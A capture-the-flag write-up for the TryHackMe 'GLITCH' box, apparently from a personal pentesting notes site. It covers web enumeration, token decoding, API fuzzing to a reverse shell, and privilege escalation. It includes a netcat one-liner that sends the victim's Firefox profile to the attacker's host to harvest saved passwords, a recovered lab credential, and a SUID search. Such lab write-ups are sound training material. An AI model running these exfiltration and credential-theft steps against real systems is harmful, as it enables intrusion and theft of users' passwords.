GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  • Privilege Escalation
  1. TryHackMe Writeups

GLITCH

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

PreviousJasonNextVulnNet: Node

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/tryhackme/glitch
cd ~/Documents/tryhackme/glitch
mkdir recon enumeration notes
touch notes/{README.md,vuln,creds}

export IP=10.10.29.23

Enumeration

First scan the machine for open ports. Scan the machine for open ports using RustScan. It's faster than Nmap, so I prefer using it exclusively for now.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -A -T4 -oN recon/rustscan.init

Looks like only the HTTP port is open. Let's open it in the browser and see what's there. Nothing interesting, so I run feroxbuster to fuzz files and directories. I also run a nikto command in background, because it will take a while.

nikto --host $URL -C all -o enumeration/nikto.txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt -o enumeration/feroxbuster

Discovered an interesting path: /api/acces.When I access it I found a token with base64 encoded value.

echo 'dGhpc19pc19ub3RfcmVhbA=='| base64 -d

Replace the token with the discovered value. Let's proceed to fuzz once more with the cookie configured accordingly.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP -b 'token=this_is_not_real'

After conducting another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js.

Get another path interesting /api/items. After a while I get something in response by changing the request method.

At this stage, I encountered a temporary impasse. After a while I proceeded to fuzz for parameters and responses with a 500 status code.

Now all I need to do is to get a reverse shell.

We get a shell as user, and in home directory we found user.txt flag. In same directory I found .firefox directory and again I was stuck for a while.

Privilege Escalation

Transfer directory in my machine and analyze it.

tar czf - .firefox | nc $my_IP 4747 
nc -lnvp 4747 | tar xvfz - 

mv .firefox firefox

This take me a lot, but finally I get the answer by open firefox and search for saved passwords.

v0id:love_the_void

During the penetration test, specific steps are followed for privilege escalation. After some time, I discovered that the "doas" file possesses the SUID bit set. Change the user to v0id and run doas.

find / -type f -perm -u=s 2>/dev/null